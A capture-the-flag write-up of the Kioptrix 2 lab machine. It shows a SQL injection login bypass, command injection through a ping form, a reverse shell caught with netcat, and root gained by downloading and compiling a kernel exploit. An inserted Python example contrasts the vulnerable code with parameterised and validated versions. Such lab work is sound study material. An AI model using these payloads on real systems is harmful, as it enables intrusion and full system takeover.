Kioptrix 2
Our initial scan shows a few ports open, but we will focus on the web app.
80/tcp open http Apache httpd 2.0.52 ((CentOS))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
We are initially confronted with a login page. Running dirb and gobuster we only come up with a few default Apache directories, with nothing special in the /cgi-bin directory. Next we test for default credentials, review the source code and tamper with request data to see if anything piques our interest, which turns out to be nothing.
Throwing a few random bad SQL characters also doesn't trigger anything juicy, until we try `' or 1=1 --` in BOTH the username and password fields.
Now we see a ping tool app, which triggers the thought of possible command execution. Trying `| uname -a` works immediately.
Since we have command execution we can try to execute a one-liner reverse shell. Python and netcat didn't seem to work, but the basic Linux bash reverse shell worked without a problem.
root@kali:/var/www/html# nc -lvp 4444
listening on [any] 4444 ...
192.168.72.136: inverse host lookup failed: Unknown host
connect to [192.168.72.128] from (UNKNOWN) [192.168.72.136] 32780
bash: no job control in this shell
bash-3.00$ whoami
apache
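The two weaknesses used above, as an added defender's-side example that is not part of the original write-up: a login check built by string concatenation beside its parameterised form, and a ping helper that validates the host as an IP address and never hands it to a shell. The in-memory user table, credentials and ping argument list are constructed for the example.

```python
import ipaddress
import sqlite3
import subprocess


def build_ping_argv(host: str) -> list:
    """Return an argv list for ping, or raise ValueError if host is not a bare IP address.

    Parsing the value as an address and passing argv directly (no shell) means
    metacharacters such as '|' never reach /bin/sh, so "127.0.0.1 | uname -a"
    is rejected instead of executed.
    """
    addr = ipaddress.ip_address(host.strip())  # ValueError for anything that is not an address
    return ["ping", "-c", "3", str(addr)]


def is_valid_ping_host(host: str) -> bool:
    try:
        build_ping_argv(host)
        return True
    except ValueError:
        return False


def run_ping(host: str) -> str:
    # subprocess with a list and no shell=True: no command interpretation of host
    result = subprocess.run(build_ping_argv(host), capture_output=True, text=True, timeout=15, check=False)
    return result.stdout


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the app's login backend (plaintext password kept only for the demo)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('john', 'secret')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Concatenation: "' or 1=1 --" closes the string, makes WHERE always true and comments out the rest.
    query = ("SELECT COUNT(*) FROM users WHERE username='" + username
             + "' AND password='" + password + "'")
    return conn.execute(query).fetchone()[0] > 0


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Bound parameters: the same payload is compared as a literal username, so no row matches.
    query = "SELECT COUNT(*) FROM users WHERE username=? AND password=?"
    return conn.execute(query, (username, password)).fetchone()[0] > 0
```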
PrivEsc
Doing some quick enumeration on our known CentOS box, we get our kernel and version details.
bash-3.00$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 athlon i386 GNU/Linux
bash-3.00$ cat /etc/redhat-release
CentOS release 4.5 (Final)
CentOS 4.5 is pretty old, so a quick kernel check using our precious searchsploit throws us a solid candidate.
root@kali:/usr/share/exploitdb/platforms# searchsploit centos 4.5
----------------------------------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms/)
----------------------------------------------------------------------- ----------------------------------
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core | lin_x86/local/9542.c
Linux Kernel 3.14.5 (CentOS 7 / RHEL) - 'libfutex' Privilege Escalatio | linux/local/35370.c
----------------------------------------------------------------------- ----------------------------------
After digging into the Ring0 exploit, the victim's kernel and OS match the vulnerability. We'll copy the exploit to our webroot and wget it from the victim's low-privilege shell.
Once the file transfer is successful, we'll compile, chmod and execute.
bash-3.00$ gcc 9542.c -o ook
bash-3.00$ chmod 777 ook
bash-3.00$ ./ook
sh: no job control in this shell
sh-3.00# uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 athlon i386 GNU/Linux
sh-3.00# whoami
root
sh-3.00# cd /root
Perfect, we have a root shell.